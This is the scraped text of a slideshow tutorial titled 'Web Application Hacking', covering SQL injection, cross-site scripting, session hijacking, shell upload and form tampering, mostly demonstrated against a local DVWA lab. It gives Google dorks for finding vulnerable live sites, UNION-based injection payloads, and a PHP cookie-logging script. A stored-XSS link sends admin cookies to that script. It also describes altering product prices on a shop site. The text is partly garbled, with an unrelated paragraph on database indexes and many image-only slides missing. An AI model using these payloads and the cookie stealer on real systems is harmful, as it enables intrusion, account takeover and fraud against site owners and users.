Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web application hacking by noah


Published on

Web Application hacking , cracking , cross site scripting, xss,css,form tampering ,sql injection, shell script,

Published in: Education
  • You Can Free Download Latest & Working ->
    Are you sure you want to  Yes  No
    Your message goes here

Web application hacking by noah

  1. 1. Web Application Hacking By Noah Franklin J
  2. 2. What is Web Application?A web application is an application that is accessed by users over a network such as theInternet or an intranetWeb Application Architecture :Although web application can be classified as programsrunning on a web browser, web applications generallyhave a Tree-tier construction as shown in Figure 11) Presentation Tier: receives the user‘s input data and shows the result of the processed data tothe user. It can be thought of as the Graphic User Interface (GUI). Flash, HTML, Javascript, etc.are all part of the presentation tier which directly interact with the user.2) CGI Tier: also known as the Server Script Process, is located in between the presentation tierand database tier. The data inputted by the user is processed and stored into the database.The database sends back the stored data to the CGI tier which is finally sent to the presentationtier for viewing. Therefore, the data processing within the web application is done at the CGITier. It can be programmed in various server script languages such as JSP, PHP, ASP, etc.3) Database Tier: stores and manages all of the processed user‘s input data. All sensitive data ofweb applications are stored and managed within the database. The database tier is responsible forthe access of authenticated users and the rejection of malicious users from the database.Web Application SetupWeb Application Hacking Page 2
  3. 3. Reasons for Attacking Web AppsWeb Application threadsWeb Application Hacking Page 3
  4. 4. Web Application ThreadsWeb Application Hacking Page 4
  5. 5. SQL InjectionWeb Application Hacking Page 5
  6. 6. SQL-Injection AttacksSQL-Injection vulnerabilities and attacks occur between the Presentation tier and the CGI tier.Most vulnerabilities are accidentally made in the development stage. The data flow of each tierusing normal and malicious input data are as shown in Figure 2. It depicts the usersAuthentication step. When an authenticated user enters its ID and Password, the Presentation tieruses the GET and POST method to send the data to the CGI tier. The SQL query within the CGItier connects to the database and processes the data.When a malicious user enters an ID such as 1‘ or ‗1=1‘--, the query within the CGI tier becomesSELECT * FROM user WHERE id=‘1‘ or ‗1=1‘—‗AND password=‘1111‘; after the --, the restof the sentence becomes a comment and because or ‗1=1‘ is always true, the authentication stepis bypassed. SQL Injection attacks are malicious data that changes the normal SQL query to amalicious SQL query and allows anomalous database access and processing. Most webapplications use data filters to prevent these kinds of SQL injection attacks. However, there aremany methods of SQL injection attacks which can bypass data filters which make it difficult toeffectively defend the database from attacks. Therefore, a more effective way of detecting andpreventing SQL injection attacks is necessary.Types of SQL Injection  Direct SQL InjectionWeb Application Hacking Page 6
  7. 7. Ex: True Conditions (Tautology) like [ ‗or 1=1 -- ]  In-Direct SQL Injection Ex: Query based injection, Blind Injection, String Based Injection, Character Based Injection, Error Based SQLi, Error based Double Query Injection, XML InjectionDirect SQL Injection Understandingif(username==franky) && (password==12345)printf("Welcome to Email ");else{printf("Invalid Username or password");}Explanation :This above code meant the username and password both matcheswith database then it will give a access to the email WelcomeThe email else the error message like Invalid usernameOr passwordSome Modification in Codeif(username==a ‘ or 1=1-- ) && (password==a‘ or 1=1--)Web Application Hacking Page 7
  8. 8. printf("Welcome to Email ");else{printf("Invalid Username or password");}Pure dynamic SQL serves as the most common form of SQL injection attacks:sqlString = ―SELECT… From [myTable]WHERE name =„‖.myInputValue.‖‟ ―;ExplanationThe same login coding with SQL injection attack then also emailWas logged and say a welcomeIndirect SQL Injection UnderstandingRequirementsWeb Application Hacking Page 8
  9. 9. Download Xampp or Wamp Google Dorks to Find Vul website to perform SQL InjectionSome Of the SQL dorks areinurl : php?id =inurl : aspx?idinurl: asp?id=Below Pictures helps to understand the Serious Issues of SQL InjectionHow To install this Wamp and DVWADownload this from above Give Link and Install Wamp and then extract DVWA rar file andCopy that folder and paste it in C:wampwwwNow start wamp server and open up Webbrowser and check for localhost/dvwaHow to create a Data base Click Create DatabaseWeb Application Hacking Page 9
  10. 10. Then Click DVWA SecurityLogin Username : admin & Password : passwordWeb Application Hacking Page 10
  11. 11. Security Change to LowClick SQL InjectionWeb Application Hacking Page 11
  12. 12. Enter 1 and submit and see the response from the Database to the browser it shows ID 1 isbelongs to Admin accountIncrease the Number 2, 3, 4 etc in the below picture is 5 and see the response of the database itshows ID 5 is belongs to BobType 6 and Submit and See the Response ID 6 is not belongs to any 1Web Application Hacking Page 12
  13. 13. Enter Single Quote ( ‗ ) on the right hand side ( next to ID=1 )Ex: localhost/dvwa/vulnerabilities/sqli/?id=1‘Type Order by 1 – comment on our browser and Hit EnterThe ORDER BY clause allows you to sort the records in your result set. The ORDER BY clause can only beused in SELECT statements. We need to find how many columns presented in this websiteIncrease the Order by 2-- and so on until we get an error Msg like Unknown clauseWeb Application Hacking Page 13
  14. 14. The UNION operator is used to combine the result-set of two or more SELECT statements.Notice that each SELECT statement within the UNION must have the same number of columns.The columns must also have similar data types. Also, the columns in each SELECT statementmust be in the same order.Use Union all select 1,2 because the database of this website contain only 2 columnslocalhost/dvwa/vulnerabilities/sqli/?id=-1 union all select 1,2 –Web Application Hacking Page 14
  15. 15. Yes in this case Id is the field on which I have defined the clustered index.If the index is ID DESC then what..And yes it would be nice to know how the performance would be affected ifId is a clustered index + primary key.Id is a clustered index and not primary key.Id is a non clustered index ASC + primary key.Id is a non clustered index ASC and not primary key.Id is a non clustered index DESC + primary key.Id is a non clustered index DESC and not primary key.Id is just AutoIncrementTo check the version of the SQL use @@versionTo Check the Database of that website use database ()Web Application Hacking Page 15
  16. 16. To Check the Table names presented on the this website use table_name frominformation_schema.tables Table_name is a default name in sql for Table NameINFORMATION_SCHEMA is the information database, the place that stores information aboutall the other databases that the MySQL server maintains. Inside INFORMATION_SCHEMAthere are several read-only tables. They are actually views, not base tables, so there are no filesassociated with them, and you cannot set triggers on them. Also, there is no database directorywith that name.Although you can select INFORMATION_SCHEMA as the default database with a USEstatement, you can only read the contents of tables, not perform INSERT, UPDATE, or DELETEoperations on them.Web Application Hacking Page 16
  17. 17. Same way for Columns use column_name from information_schema.columnsTo select a particular table use column name where table_name=table nameWeb Application Hacking Page 17
  18. 18. Password in md5 hash encryption to decrypt use Application Hacking Page 18
  19. 19. Web Application Hacking Page 19
  20. 20. Cross Site ScriptingWeb Application Hacking Page 20
  21. 21. What is Cross Site Scripting ?Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications,such as web browsers through breaches of browser security, that enables attackers to inject client-sidescript into Web pages viewed by other users. A cross-site scripting vulnerability may be used byattackers to bypass access controls such as the same origin policyTypes of Cross Site ScriptingXSS attacks are broadly classified into 2 types  Non-Persistent ( Reflection Attack )  Persistent ( Stored Attack )  Dom Based XSSNon-Persistent XSS AttackIn case of Non-Persistent attack, it requires a user to visit the specially crafted link by theattacker. When the user visits the link, the crafted code will get executed by the user‘s browser.Let us understand this attack better with an example.Example for Non-Persistent XSSindex.php:<?php$name = $_GET[name];echo "Welcome $name<br>";echo "<a href="">Click to Download</a>";?>Now the attacker will craft an URL as follows and send it to the victimindex.php?name=guest<script>alert(attacked)</script>When the victim load the above URL into the browser, he will see an alert box which says‗attacked‘. Even though this example doesn‘t do any damage, other than the annoying ‗attacked‘pop-up, you can see how an attacker can use this method to do several damaging things.Web Application Hacking Page 21
  22. 22. Again using Local Host DVWA Performing Xss Reflection AttackEnter Any Name and Submit Check the Response of the WebsiteWeb Application Hacking Page 22
  23. 23. Example I used My Name Noah Franklin See the Response of the Website its say Hello NoahFranklinReplace Noah Franklin into <script>alert(―hacked‖)</script>The alert () method displays an alert box with a specified message and an OK buttonWeb Application Hacking Page 23
  24. 24. Persistent XSS AttackIn case of persistent attack, the code injected by the attacker will be stored in a secondary storagedevice (mostly on a database). The damage caused by Persistent attack is more than the non-persistent attack. Here we will see how to hijack other user‘s session by performing XSS.SessionHTTP protocol is a stateless protocol, which means, it won‘t maintain any state with regard tothe request and response. All request and response are independent of each other. But most of theweb application don‘t need this. Once the user has authenticated himself, the web server shouldnot ask the username/password for the next request from the user. To do this, they need tomaintain some kind of states between the web-browser and web-server which is done through the―Sessions‖.When the user login for the first time, a session ID will be created by the web server and it willbe sent to the web-browser as ―cookie‖. All the sub-sequent request to the web server, will bebased on the ―session id‖ in the cookie.Examples for Persistent XSS AttackThis sample web application we‘ve given below that demonstrates the persistent XSS attack doesthe following:  There are two types of users: ―Admin‖ and ―Normal‖ user.  When ―Admin‖ log-in, he can see the list of usernames. When ―Normal‖ users log-in, they can only update their display name.Web Application Hacking Page 24
  25. 25. CodeCoo.php<?php$cookie = $_GET[c];$ip = getenv (REMOTE_ADDR);$date = date("H:i dS F");$referer=getenv (HTTP_REFERER);$fp = fopen(cookies, a);fwrite($fp, "IP: " . $ip . "rn");fwrite($fp, "Date: " .$date. "rn");fwrite($fp, "Referer: " . $referer . "rn" );fwrite($fp, "Cookie: " . $cookie ."rn***************************************************************rn");fclose($fp);header ("Location:"); /* USE IF WANT TO REDIRECT TOANOTHER PAGE */?>Put this below code into Message box <ahref=javascript:void(document.location=http://localhost/coo.php?c=+escape(document.cookie)); </a>Web Application Hacking Page 25
  26. 26. Checkthe Below Picture it was logged in as a admin in FirefoxOnce admin Clicks the link Vist the useful tips section it will repload and saves the cookieIn Chome Browse logged in as normal userStored cookie of admin in below pictureWeb Application Hacking Page 26
  27. 27. We Logged in as a Admin in Chrome Browser Web Application Hacking Page 27
  28. 28. Brute ForceWeb Application Hacking Page 28
  29. 29. Web Application Hacking Page 29
  30. 30. Web Application Hacking Page 30
  31. 31. Uploading ShellWeb Application Hacking Page 31
  32. 32. Upload any image file and check if site is allow us to upload shell fileWeb Application Hacking Page 32
  33. 33. Cross Site Request ForgeryWeb Application Hacking Page 33
  34. 34. Web Application Hacking Page 34
  35. 35. Web Application Hacking Page 35
  36. 36. Web Application Hacking Page 36
  37. 37. Form TamperingWeb Application Hacking Page 37
  38. 38. Use Mozila Tamper Data Addons Website containing a loophole which allows me to change the Cost ofthe product1.Open mozila webbrowser 2. Open website 3.optionstamper data 4. Start tamper and hit the Add tocart button and it will allows you to change the cost of the product which shows in given below picturesWeb Application Hacking Page 38
  39. 39. Web Application Hacking Page 39
  40. 40. Web Application Hacking Page 40